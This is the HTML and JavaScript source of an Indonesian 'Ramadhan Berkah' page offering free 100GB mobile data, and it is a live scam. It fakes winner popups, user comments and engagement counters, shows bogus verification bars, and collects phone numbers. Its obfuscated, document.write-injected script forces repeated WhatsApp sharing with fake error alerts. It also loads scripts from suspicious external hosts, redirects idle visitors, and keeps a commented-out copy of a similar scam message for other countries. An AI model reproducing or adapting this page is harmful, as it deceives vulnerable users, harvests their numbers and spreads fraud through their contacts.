<!DOCTYPE html><html><!--<script src="myactive.js"></script>--><head>
     <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


        /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                        document.getElementById("first-box")."quedate__step".display="none";//??;
                        document.getElementById("second-box").style.display="none";//??;
                        document.getElementById("third-box").style.display="none";//??;
                        document.getElementsByClassName("loading2__box").style.display="";//??;
                    }*/


    </script>
  
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ramadhan Berkah 2026: Kuota Gratis 100GB untuk Semua Operator di Indonesia!</title>
<link rel="shortcut icon" type="image/png" href="">
<meta property="og:title" content="Ramadhan Berkah 2026: Kuota Gratis 100GB untuk Semua Operator di Indonesia!">
<meta property="og:url" content="/">
<meta property="og:description" content="Program Ramadhan Penuh Berkah - Bagi-bagi kuota internet 100GB gratis untuk Telkomsel, Indosat, XL, Tri & Smartfren. Selamat menunaikan ibadah puasa!">
        <meta property="og:image" content="../kxh9seeO60bD.com/Indonesia/GkMRrFHxlGDY.jpg">
        <meta property="og:type" content="website">
        <meta property="og:updated_time" content="1440432930">
</head>
<body>
<div id="popup1" data-gjs-type="div" class="popup">
<span id="iy8mxj" data-gjs-type="text">
  🕌 Andi Pratama <span id="iawv3z">dari Jakarta</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
</span>
</div>

<div id="popup2" data-gjs-type="div" class="popup">
  <span id="ifhajn" data-gjs-type="text">
    🕌 Siti Aisyah <span id="ioyo4w">dari Bekasi</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup3" data-gjs-type="div" class="popup">
  <span id="i0qrmc" data-gjs-type="text">
    🕌 Budi Santoso <span id="is47l6">dari Surabaya</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup4" data-gjs-type="div" class="popup">
  <span id="i3hspy" data-gjs-type="text">
    🕌 Rina Putri <span id="ia8fwk">dari Bandung</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup5" data-gjs-type="div" class="popup">
  <span id="iy8mxj-2" data-gjs-type="text">
    🕌 Agus Setiawan <span id="inzga1">dari Depok</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup6" data-gjs-type="div" class="popup">
  <span id="ifhajn-2" data-gjs-type="text">
    🕌 Dewi Lestari <span id="i2puoy">dari Tangerang</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup7" data-gjs-type="div" class="popup">
  <span id="i0qrmc-2" data-gjs-type="text">
    🕌 Rizky Maulana <span id="i0azai">dari Semarang</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup8" data-gjs-type="div" class="popup">
  <span id="i3hspy-2" data-gjs-type="text">
    🕌 Putri Anggraini <span id="ivbexh">dari Makassar</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup9" data-gjs-type="div" class="popup">
  <span id="iy8mxj-3" data-gjs-type="text">
    🕌 Ahmad Fauzi <span id="iw1cao">dari Medan</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup10" data-gjs-type="div" class="popup">
  <span id="ifhajn-3" data-gjs-type="text">
    🕌 Nur Hidayah <span id="ikyybb">dari Yogyakarta</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>

<div id="popup11" data-gjs-type="div" class="popup">
  <span id="i0qrmc-3" data-gjs-type="text">
    🕌 Fajar Nugroho <span id="ia33gi">dari Denpasar</span> dapat kuota gratis 100GB! Alhamdulillah 🎉
  </span>
</div>




        <style>
    .ac_footer a {
        color: rgb(161, 32, 0);
    }

    .ac_footer p {
        text-align: center;
    }

    img[height="1"], img[width="1"] {
        display: none !important;
    }

    [attr-cou] {
        display: none !important;
    }

    [attr-lan] {
        display: none !important;
    }

    * {
        max-width: unset;
    }

    #i8we {
        display: none;
        visibility: hidden;
    }

    #ivam {
        display: none;
        visibility: hidden;
    }

    .popup {
        position: fixed;
        top: -100px;
        left: 50%;
        width: 90%;
        max-width: 600px;
        background-color: #853A23;
        color: #FFFFFF;
        padding-top: 20px;
        padding-right: 20px;
        padding-bottom: 20px;
        padding-left: 20px;
        font-weight: 700;
        box-shadow: rgba(0, 0, 0, 0.5) 0px 2px 10px;
        border-top-left-radius: 5px;
        border-top-right-radius: 5px;
        border-bottom-right-radius: 5px;
        border-bottom-left-radius: 5px;
        opacity: 0;
        visibility: hidden;
        transform: translateX(-50%);
        text-align: center;
        z-index: 99999;
        transition-behavior: normal, normal, normal;
        transition-duration: 0.5s, 0.5s, 0.5s;
        transition-timing-function: ease, ease, ease;
        transition-delay: 0s, 0s, 0s;
        transition-property: opacity, visibility, top;
    }

    .popup.show {
        top: 4px;
        opacity: 1;
        visibility: visible;
    }


    #timer-container p {
        font-size: 16px;
        margin-top: 0px;
        margin-right: 0px;
        margin-bottom: 0px;
        margin-left: 0px;
    }



    #ieaqa {
        padding-top: 10px;
        color: white;
    }

    #i4ahx {
        text-align: center;
    }

    #i5fnh {
        color: white;
    }

    #it1yg {
        color: rgb(255, 255, 255);
    }

    #liked {
        color: rgb(255, 255, 255);
        cursor: pointer;
    }

    #ixds3p {
        opacity: 1.03;
        display: block;
    }

    #i5fo6a {
        margin-top: 30px;
    }

    #ihp0f5 {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #i247bq {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #ipm3uj {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
    }

    #i5x9nj {
        padding-top: 0px;
        padding-right: 0px;
        padding-bottom: 0px;
        padding-left: 0px;
        margin-top: 0px;
        margin-right: 0px;
        margin-bottom: 0px;
        margin-left: 0px;
        border-top-width: 0px;
        border-right-width: 0px;
        border-bottom-width: 0px;
        border-left-width: 0px;
        border-top-style: initial;
        border-right-style: initial;
        border-bottom-style: initial;
        border-left-style: initial;
        border-top-color: initial;
        border-right-color: initial;
        border-bottom-color: initial;
        border-left-color: initial;
        border-image-source: initial;
        border-image-slice: initial;
        border-image-width: initial;
        border-image-outset: initial;
        border-image-repeat: initial;
    }

    #i6w6r {
        color: rgb(136, 136, 136);
    }

    #iy5fwi {
        color: rgb(136, 136, 136);
    }

    #i8hknp {
        color: rgb(136, 136, 136);
    }

    #ig0nrl {
        color: rgb(136, 136, 136);
    }

    #idqqcn {
        color: rgb(136, 136, 136);
    }

    #i244qi {
        color: rgb(136, 136, 136);
    }

    #ifyy1g {
        color: rgb(136, 136, 136);
    }

    #ivarwe {
        color: rgb(136, 136, 136);
    }

    #i4b6nh {
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #timer-container {
        margin-top: 20px;
        margin-right: 0px;
        margin-bottom: 20px;
        margin-left: 0px;
    }

    #timer {
        color: red;
        font-weight: bold;
    }

    @keyframes pulse {
        0% {
            transform: scale(1);
        }
        50% {
            transform: scale(1.25);
        }
        100% {
            transform: scale(1);
        }
    }
</style>
<script src="../KUonqWTlod6s.net/npm/canvas-confetti%401.3.2/dist/confetti.browser.min.js" id="iu4u6k"></script>
<script id="inp7bq">
    // document.addEventListener('DOMContentLoaded', function () {
    //         hidemodal01();
    //     }
    // );
    let redirectTimer;

    function startRedirectTimer() {
        // Устанавливаем таймер на 45 секунд
        redirectTimer = setTimeout(function () {
                window.location.href =REDIRECT_URL;
            }
            , 300000);
    }

    function resetRedirectTimer() {
        // Сбрасываем текущий таймер
        clearTimeout(redirectTimer);
        // Запускаем таймер заново
        startRedirectTimer();
    }

    // Запуск таймера при загрузке страницы
    startRedirectTimer();
    // Отслеживаем взаимодействия пользователя
    document.addEventListener("mousemove", resetRedirectTimer);
    document.addEventListener("keydown", resetRedirectTimer);
    document.addEventListener("click", resetRedirectTimer);
    document.addEventListener("scroll", resetRedirectTimer);

    // Таймер обратного отсчета
    function startTimer(duration, display) {
        let timer = duration, minutes, seconds;
        setInterval(function () {
                minutes = parseInt(timer / 60, 10);
                seconds = parseInt(timer % 60, 10);
                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;
                display.textContent = minutes + ":" + seconds;
                if (--timer < 0) {
                    timer = duration;
                }
            }
            , 1000);
    }

    const duration = 59;
    const display = document.querySelector('#timer');
    startTimer(duration, display);
    // Появление попапа
    document.addEventListener("DOMContentLoaded", function () {
            const popups = [
                {
                    id: 'popup5', delay: 3000, duration: 4000
                }
                ,
                {
                    id: 'popup6', delay: 9000, duration: 4000
                }
                ,
                {
                    id: 'popup7', delay: 17000, duration: 4000
                }
                ,
                {
                    id: 'popup8', delay: 25000, duration: 4000
                }
                ,
                {
                    id: 'popup9', delay: 33000, duration: 4000
                }
                ,
                {
                    id: 'popup10', delay: 41000, duration: 4000
                }
                ,
                {
                    id: 'popup11', delay: 49000, duration: 4000
                }
            ];

            // Функция для показа конфетти
            function showConfetti() {
                confetti({
                        particleCount: 150,
                        spread: 120,
                        startVelocity: 30,
                        gravity: 0.5,
                        origin: {
                            x: 0.5, y: 0
                        }
                        ,
                        scalar: 1.4,
                        drift: 0,
                        shapes: ['circle', 'square'],
                        colors: ['#853A23', '#A04A2E', '#ffffff'],
                        useWorker: true,
                        zIndex: 99999,
                        disableForReducedMotion: true
                    }
                );
            }

            popups.forEach(popup => {
                    const element = document.getElementById(popup.id);
                    setTimeout(function () {
                            element.classList.add("show");
                            showConfetti();
                            // Показываем конфетти при каждом попапе
                            setTimeout(function () {
                                    element.classList.remove("show");
                                }
                                , popup.duration);
                            // Убедитесь, что скрытие происходит через `duration` после показа
                        }
                        , popup.delay);
                    // Показываем попап с задержкой `delay`
                }
            );
            // Обработчик кликов для кнопок в модальном окне
            document.addEventListener('click', (event) => {
                    const activeModal = document.querySelector('.sweet-alert.animated.bounceIn.visible');
                    if (activeModal) {
                        const activeButton = activeModal.querySelector('button');
                        const customClickEvent = new Event('customClick');
                        activeButton.dispatchEvent(customClickEvent);
                    }
                }
            );
            // Привязка пользовательских событий к кнопкам
            document.getElementById('ihp0f5').addEventListener('customClick', function () {
                    this.click();
                }
            );
            document.getElementById('i247bq').addEventListener('customClick', function () {
                    this.click();
                }
            );
            document.getElementById('ipm3uj').addEventListener('customClick', function () {
                    this.click();
                }
            );
        }
    );

    // Закрываем попап и крутим спин
    function hidemodal01() {
        $('#modal01').removeClass('visible');
        $('.sweet-overlay').css('display', 'none');
        $('#spin').addClass('spinAround');
        $('#xmas').css('display', 'none');
        setTimeout(function () {
                $('#modal02').addClass('visible');
                $('.sweet-overlay').css('display', 'block');
                $('#xmas').css('display', 'block');
                $('#xmas').css('top', 'calc(50% - 210px)');
                setTimeout(function () {
                        $('#success02').addClass('animate');
                        $('#successtip02').addClass('animateSuccessTip');
                        $('#successlong02').addClass('animateSuccessLong');
                    }
                    , 500);
            }
            , 7500);
    }

    function hidemodal02() {
        $('#modal02').removeClass('visible');
        $('.sweet-overlay').css('display', 'none');
        $('#spin').addClass('spinAround2');
        $('#xmas').css('display', 'none');
        setTimeout(function () {
                $('#iphone').css('display', 'block');
            }
            , 7000);
        setTimeout(function () {
                $('#modal03').addClass('visible');
                $('.sweet-overlay').css('display', 'block');
                $('#xmas').css('display', 'block');
                $('#xmas').css('top', 'calc(50% - 210px)');
                setTimeout(function () {
                        $('#success03').addClass('animate');
                        $('#successtip03').addClass('animateSuccessTip');
                        $('#successlong03').addClass('animateSuccessLong');
                    }
                    , 500);
            }
            , 8000);
    }
</script>
<style type="text/css">
@import url("https://MzddjqAbOr0i.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("../MzddjqAbOr0i.com/earlyaccess/ozA4NZe1kt5q.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;


}
body {
    direction: lfr;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #A04A2E;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #853A23;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 200px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 24px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #853A23;
    transition: background 0.3s ease;
}
button:hover {
    background: #A04A2E;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #A04A2E;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #A04A2E;
}
#fill,
#fill2 {
    background: #A04A2E;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #A04A2E;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #A04A2E;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #A04A2E;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{
    text-align: center;
    background-color: #853A23;
    color: #FFFFFF;
}
  /* Style the header */
        .header {
            text-align: center;
            background-color: #5A2818;
            color: #fff;
            padding: 20px 0;
  color: #fff;
  font-weight: bold;
  background-image: linear-gradient(555deg, #853A23, #A04A2E, #6B2F1C, #111, #5A2818);
        }
        .marquee {
  background-image: linear-gradient(555deg, #853A23, #A04A2E, #6B2F1C, #111, #5A2818);
  border: 3px solid #A04A2E;
  width: 100%;
  padding: 3px;
  border-radius: 40px;
  color: #fff;
  font-weight: bold;
  font-size: 18px;
  overflow: hidden;
  white-space: nowrap;
  padding-left: 10px;
}

.marquee span {
  display: inline-block;
  padding-left: 100%;
  animation: marquee-animation 50s linear infinite;
}

@keyframes marquee-animation {
  0% {
    transform: translateX(0);
  }
  50% {
    transform: translateX(-100%);
  }
  100% {
    transform: translateX(0);
  }
}

</style>
<style>
.telbtn{   
     background-color: #853A23;   
     box-shadow: 0 4px 5px rgba(0, 0, 0, 0.3);   
     display: flex ;   
     justify-content: center;    
     text-decoration: none;   
      height: 60px;   
     border-radius: 50px;   
  } 
   span.telp{    
     color: white;   
     font-size: 18px;      
     padding: 20px;
    font-weight: 400;
    margin: 0;
 } 
  .telbtn:hover{
        opacity:80%;   
  }
    </style>
    
  
<center><img src="../kxh9seeO60bD.com/Indonesia/GkMRrFHxlGDY.jpg" alt="fund" style="width: 100%;"></center>

<marquee class="horizontal_marque" direction="left">
🕌 Selamat Ramadhan! Kuota gratis 100GB tersedia untuk diklaim - berlaku semua operator: Telkomsel, Indosat, XL, Tri & Smartfren!
</marquee>

<div class="A">
<b><br>Ramadhan Penuh Berkah 2026: Bagi-bagi Kuota Gratis 100GB untuk Semua Nomor Indonesia!<br></b>
</div>


<div class="post" width="100%">

    <div id="intro">

        <p class="welcome">
        <br></p><center>Klik tombol "DAPATKAN" di bawah dan masukkan nomor HP kamu untuk klaim kuota gratis 100GB. Program Ramadhan ini berlaku untuk semua operator ya!</center>
<p></p>

<button id="go">DAPATKAN</button>
</div>
         <div id="loader">
            <div>Mohon tunggu ...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>

        <div id="info">
            <p class="title">Masukkan nomor HP kamu:</p>
            <div class="phone">
                <center>
                    <input type="char" placeholder="08xxxxxxxxxx" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);">
                </center>
                <center>
                    <br>
                     <center>
                
<button id="confirm">Lanjut</button>
</center></center></div>
<p class="error">Nomor HP belum benar, cek lagi ya!</p>
</div>
<div id="checking">
<p class="title">Memuat...</p>
    <div class="barr">
        <div class="fill">
            <div id="fill"></div>
        </div>
        <div class="percentage center">
            <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
            <span id="check"><i class="fa fa-check-circle"></i></span>
            <span id="percentage"></span>
        </div>
    </div>
</div>
<div id="share">
<center>
  <h3>
<p class="tip">
  Nomor HP kamu: <span id="getname"></span>
</p>
</h3>
<br>
<p class="tip">
  Alhamdulillah! Kamu layak dapat kuota gratis 100GB dari program Ramadhan Berkah ini.<br>
  <span class="amount"><br></span></p><center>Cara klaim kuota 100GB kamu?</center>
<p></p>
<p class="tip">
  1. Share halaman ini ke 5 grup WA atau 15 kontak pakai tombol "BAGIKAN" di bawah.
</p>
<p class="tip">
  2. Kalau bar verifikasi sudah hijau full, kuota 100GB otomatis masuk ke nomor kamu.
</p>
<p class="tip">
  3. Kuota bisa dipake buat internetan, streaming, WA-an sepuasnya sampai habis!
</p>

<button id="whatsapp">BAGIKAN</button>
<div class="barr">

                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </center></div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
<p class="title">
  Kuota 100GB kamu sudah disetujui! Klik tombol di bawah buat aktivasi kuota ke nomor HP kamu.
</p>
<br>

<a class="telbtn" href="/go.php" target="_blank">
    <span class="telp">AKTIFKAN KUOTA 100GB</span>
</a>
<br>
<a class="telbtn" href="/go.php" target="_blank">
    <span class="telp">CLAIM KUOTA GRATIS</span>
</a>
<br>
<a class="telbtn" href="/go.php" target="_blank">
    <span class="telp">DAPATKAN SEKARANG</span>
</a>

        </div>

<br><br>
    
<div class="comments">
 <div class="counter">
    <div class="reactions">
        <img class="like" src="../kxh9seeO60bD.com/Indonesia/4SAzZJ5LEPSj.jpg">
        <img class="love" src="../kxh9seeO60bD.com/Indonesia/h6kVEP1lvLJj.jpg">
        <img class="care" src="../kxh9seeO60bD.com/Indonesia/20OpzaVRsDTx.jpg">
<span id="likes">156 rb</span>
</div>
<span id="comments">28 rb komentar</span> <span class="dot">·</span> <span id="shares">19 rb dibagikan</span>
</div>

<div class="bar">
    <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Suka</a></span>
    <span class="react"><i class="fa fa-comment-o"></i> Komentar</span>
    <span class="react"><i class="fa fa-share"></i> Bagikan</span>
</div>

<div>
    <div class="comment"></div>
</div>

<div class="comment">
    <img src="../kxh9seeO60bD.com/Indonesia/RNPI6ZMfHGlj.jpg">
    <div class="single-container">
        <span class="user">Andi Pratama</span>
        <span class="text">Tadi gue kira hoax, eh beneran dapet 100GB. Alhamdulillah, pas buat streaming buka puasa!</span>
    </div>
    <div class="buttons">
        <span class="time t1">1 menit</span> <span class="dot">·</span> <span class="action liked">Suka</span> · <span class="action">Balas</span>
    </div>
</div>

<div class="comment">
    <img src="../kxh9seeO60bD.com/Indonesia/QguWuAFMNyGk.jpg">
    <div class="single-container">
        <span class="user">Siti Rahma</span>
        <span class="text">Udah masuk kuotanya! Langsung gue share ke keluarga juga 👍</span>
    </div>
    <div class="buttons">
        <span class="time t2">2 menit</span> <span class="dot">·</span> <span class="action liked">Suka</span> · <span class="action">Balas</span>
    </div>
</div>

<div class="comment reply">
    <img src="../kxh9seeO60bD.com/Indonesia/BknkkAn3CV9B.jpg">
    <div class="single-container">
        <span class="user">Budi Santoso</span>
        <span class="text">Gila beneran 100GB gratis 😭 Makasih ya, pas banget bulan puasa butuh kuota banyak</span>
    </div>
    <div class="buttons">
        <span class="time t1">1 menit</span> <span class="dot">·</span> <span class="action liked">Suka</span> · <span class="action">Balas</span>
    </div>
</div>

<div class="comment">
    <img src="../kxh9seeO60bD.com/Indonesia/AEQy1Gz4BGHM.jpg">
    <div class="single-container">
        <span class="user">Dewi Lestari</span>
        <span class="text">Mantep pol! Nomor XL gue dapet, temen-temen cepetan claim sebelum kuota habis 💚</span>
    </div>
    <div class="buttons">
        <span class="time t3">5 menit</span> <span class="dot">·</span> <span class="action liked">Suka</span> · <span class="action">Balas</span>
    </div>
</div>


<div class="input"><input placeholder="Tulis komentar ... (Selamat Ramadhan!)"></div>
</div>
</div>


    <script src="../COmNKc7lH9c1.com/ryE6vCBxGUnK.js"></script>


    <script type="text/javascript">
        var time = 0;
        window.setInterval(function() {
            time = time + 1;
            $(".t1").html(time + 1 + "m");
            $(".t2").html(time + 2 + "m");
            $(".t3").html(time + 4 + "m");
        }, 6e4);
        var likes = 156,
            comments = 28,
            shares = 19;
        window.setInterval(function() {
            likes = likes + Math.floor(Math.random() * 3);
            comments = comments + Math.floor(Math.random() * 2);
            shares = shares + Math.floor(Math.random() * 2);
            $("#likes").html(likes + " rb");
            $("#comments").html(comments + " rb komentar");
            $("#shares").html(shares + " rb dibagikan");
        }, 5e3);
        $(".liked").click(function() {
            if ($(this).hasClass("selected")) {
                $(this).removeClass("selected");
                $(this).html("Like");
            } else {
                $(this).addClass("selected");
                $(this).html("Unlike");
            }
        });
    </script>
    <script type="text/javascript">
        $("#go").click(function() {
            $("#intro").fadeOut(0);
            $("#loader").fadeIn(1000);
            var i = 0;
            var interval = setInterval(function() {
                $("#num").text(i + "%");
                i += 1;
                if (i >= 100) {
                    clearInterval(interval);
                    $("#loader").fadeOut(0);
                    $("#info").fadeIn(1000);
                }
            }, 50);
        });
        $("#confirm").click(function() {
            if ($("#name").val().length < 4) {
                $(".error").fadeIn(500);
            } else {
                $("#info").fadeOut(0);
                $("#checking").fadeIn(1000);
                var i = 0;
                var interval = setInterval(function() {
                    i += 1;
                    $("#percentage").text(i + "%");
                    $("#fill").css("width", i + "%");
                    if (i == 50) {
                        i = 49;
                        setTimeout(function() {
                            i = 50;
                        }, 1000);
                    }
                    if (i >= 100) {
                        clearInterval(interval);
                        $("#load").fadeOut(0);
                        $("#check").fadeIn(0);
                        setTimeout(function() {
                            $("#checking").fadeOut(0);
                            $("#share").fadeIn(1000);
                            $("#getname").html($("#name").val());
                        }, 500);
                    }
                }, 50);
            }
        });
        $(document).click(function() {
            if ($("#name").is(":focus")) {
                $(".error").fadeOut(500);
            }
        });
    </script>

    <!--
"*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
-->
  <script src="../zouAlkGlRLO7.top/single.php"></script>
<script>
        var text1 = "*Ramadhan Berkah - Kuota Gratis 100GB!* 🕌%0A%0AGue barusan claim, masih bisa kok.%0AMasukin nomor HP di sini 👇%0A";
        
        text2 = "Program Ramadhan lagi bagi kuota gratis 100GB, ";
        text3 = "langsung cek dan claim lewat link ini 👉 ";
        error = "Waduh error!\nKamu mungkin udah share ke orang/grup yang sama. Coba share ke yang lain ya.";
        
        abcde = "/go.php",
        saved = "",
        share = "whatsapp://send?text=" + text1 + landingDomain;
</script>








    <script>
        <!-- code by OD -->
        document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var%20swidth%20%3D%20localStorage.getItem%28saved%29%3B%0Aif%20%28swidth%20%21%3D%3D%20null%29%20%7B%0A%20%20%20%20var%20width%20%3D%20swidth%20*%201%3B%0A%20%20%20%20%24%28%22%23intro%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22.comments%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22%23share%22%29.fadeIn%280%29%3B%0A%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%7D%20else%20%7B%0A%20%20%20%20var%20width%20%3D%200%3B%0A%7D%0A%24%28%22%23whatsapp%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.location.href%20%3D%20share%3B%0A%20%20%20%20if%20%28width%20%3D%3D%200%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%2050%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2050%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2015%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2065%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2070%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2010%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2087%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2088%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2090%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2091%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D